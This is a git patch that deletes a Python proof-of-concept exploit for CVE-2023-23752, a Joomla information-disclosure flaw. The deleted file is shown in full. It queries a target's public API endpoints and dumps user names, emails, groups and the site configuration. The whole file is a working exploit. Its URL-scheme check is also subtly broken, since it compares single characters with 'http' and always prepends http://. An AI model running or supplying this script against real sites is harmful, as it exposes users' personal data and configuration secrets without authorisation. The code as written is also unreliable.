From 2f136f2a5f0f429c3c38893bf1e65530186550f5 Mon Sep 17 00:00:00 2001
From: 0xVoodoo <79277183+0xVoodoo@users.noreply.github.com>
Date: Thu, 30 Apr 2026 20:29:55 -0600
Subject: [PATCH] Delete CVE-2023-23752.py
---
CVE-2023-23752.py | 76 -----------------------------------------------
1 file changed, 76 deletions(-)
delete mode 100644 CVE-2023-23752.py
diff --git a/CVE-2023-23752.py b/CVE-2023-23752.py
deleted file mode 100644
index bef468d..0000000
--- a/CVE-2023-23752.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import requests
-import json
-import argparse
-
-class User:
- def __init__(user, name, email, lastvisitDate, groupNames):
- user.name = name
- user.email = email
- user.lastvisitDate = lastvisitDate
- user.groupNames = groupNames
-
- def __str__(user):
- return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
-
-def vulnCheck(tgt):
- verUrl = tgt + "/administrator/manifests/files/joomla.xml"
- verData = requests.get(verUrl)
- if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
- print("[-] Site does not appear to be vulnerable!")
- raise SystemExit
-
-def getUsers(tgt):
- usrUrl = tgt + "/api/index.php/v1/users?public=true"
- usrData = requests.get(usrUrl)
- if "404" in usrData.text.lower() or "403" in usrData.text.lower():
- print("[-] Error fetching user data, site may not be vulnerable")
- raise SystemExit
- parsedUsrs = json.loads(usrData.text)
- return parsedUsrs
-
-def parseUsers(usrData):
- users = []
- for user in usrData["data"]:
- userAtribs = user["attributes"]
- newUser = User(userAtribs["username"],
- userAtribs["email"],
- userAtribs["lastvisitDate"],
- userAtribs["group_names"] )
- users.append(newUser)
- return users
-
-def getConfig(tgt):
- cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
- cfgData = requests.get(cfgUrl)
- if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
- print("[-] Error fetching user data, site may not be vulnerable")
- raise SystemExit
- parsedCfg = json.loads(cfgData.text)
- return parsedCfg
-
-
-
-if __name__ == "__main__":
- parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
- parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
- args = parser.parse_args()
-
- tgt = args.target.lower()
-
- if tgt[4] != "http" and tgt[5] != "https":
- print("[*] No URL schema specified, defaulting to HTTP")
- tgt = "http://" + tgt
-
- vulnCheck(tgt)
-
- print(f"\n[+] User data found!")
- print("----------")
- for user in parseUsers(getUsers(tgt)):
- print(user)
- print("----------")
-
- print(f"\n[+] Config data found!")
- print("----------")
- for i in getConfig(tgt)["data"]:
- print(i["attributes"])
-